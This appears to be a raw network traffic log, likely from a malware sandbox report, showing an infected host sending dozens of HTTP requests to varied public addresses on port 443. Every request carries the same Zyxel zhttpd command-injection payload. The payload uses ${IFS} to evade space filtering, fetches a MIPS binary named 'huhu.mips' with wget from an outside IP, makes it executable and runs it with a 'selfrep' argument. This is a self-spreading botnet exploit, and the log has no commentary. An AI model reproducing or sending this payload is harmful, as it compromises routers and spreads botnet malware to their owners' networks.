                                      Jan 19, 2024 17:29:30.732827902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3982192.168.2.145581234.181.8.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732892990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3983192.168.2.145904876.195.7.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732937098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3984192.168.2.143577242.64.94.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732981920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3985192.168.2.145977485.71.26.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733026028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3986192.168.2.144462647.118.31.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733053923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3987192.168.2.1457198158.55.17.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733081102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3988192.168.2.1442698100.26.244.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733113050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3989192.168.2.144235679.169.210.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733129025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3990192.168.2.1452938111.205.155.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733172894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3991192.168.2.1434760142.45.107.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733208895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3992192.168.2.145545640.103.49.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733253956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3993192.168.2.1435330137.248.214.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733274937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3994192.168.2.1453758179.152.255.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733316898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3995192.168.2.145399025.195.105.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733355045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3996192.168.2.1437388117.141.227.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733408928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3997192.168.2.143933063.25.92.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733452082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3998192.168.2.1447424196.87.183.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733496904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3999192.168.2.14550265.100.15.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733532906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4000192.168.2.143715270.137.43.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733576059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4001192.168.2.1437294177.173.220.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733613968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4002192.168.2.1444894159.81.250.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733637094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4003192.168.2.14498484.13.201.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733685017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4004192.168.2.1460474117.182.139.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.733721018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4005192.168.2.145570023.171.178.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.736510992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4006192.168.2.144841494.253.232.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737124920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4007192.168.2.1460164160.87.209.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737168074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4008192.168.2.145355683.187.196.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737201929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4009192.168.2.144362083.163.84.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737247944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4010192.168.2.144870481.100.161.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737284899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4011192.168.2.1437618183.36.14.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737319946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4012192.168.2.1460204154.63.78.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737341881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4013192.168.2.144887078.254.197.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737376928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4014192.168.2.143698874.59.232.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737428904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4015192.168.2.1457276198.229.52.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737449884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4016192.168.2.146093848.219.64.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737484932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4017192.168.2.143638062.123.128.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737548113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4018192.168.2.1438958213.159.216.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737564087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4019192.168.2.144931632.220.119.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737618923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4020192.168.2.1435386212.94.150.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737644911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4021192.168.2.143435253.149.14.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737685919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4022192.168.2.1450522164.181.133.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737713099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4023192.168.2.144291832.32.151.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737746954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4024192.168.2.1455018210.142.30.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737785101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4025192.168.2.145077892.211.89.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.737795115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4026192.168.2.1444756161.60.23.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.745949030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4027192.168.2.1437030180.226.155.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.745949030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4028192.168.2.14512362.23.97.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.745990992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4029192.168.2.1454566190.79.15.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.745987892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4030192.168.2.1436364126.172.95.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.745987892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4031192.168.2.1448442137.173.209.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746032953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4032192.168.2.145202698.115.134.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746062040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4033192.168.2.145710686.120.78.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746098042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4034192.168.2.1437868155.8.37.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746148109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4035192.168.2.1441334180.67.248.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746155024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4036192.168.2.1453604125.18.195.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746177912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4037192.168.2.1440292202.60.0.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746222973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4038192.168.2.1443936220.171.85.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746299982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4039192.168.2.1443260168.159.208.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746340990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4040192.168.2.1454240166.54.173.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746365070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4041192.168.2.145689831.211.222.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746421099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4042192.168.2.146050412.4.129.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746442080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4043192.168.2.144649023.187.51.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746484041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4044192.168.2.1440326150.39.5.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746541023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4045192.168.2.1455088212.26.45.168443
                                      TimestampBytes transferredDirectionData
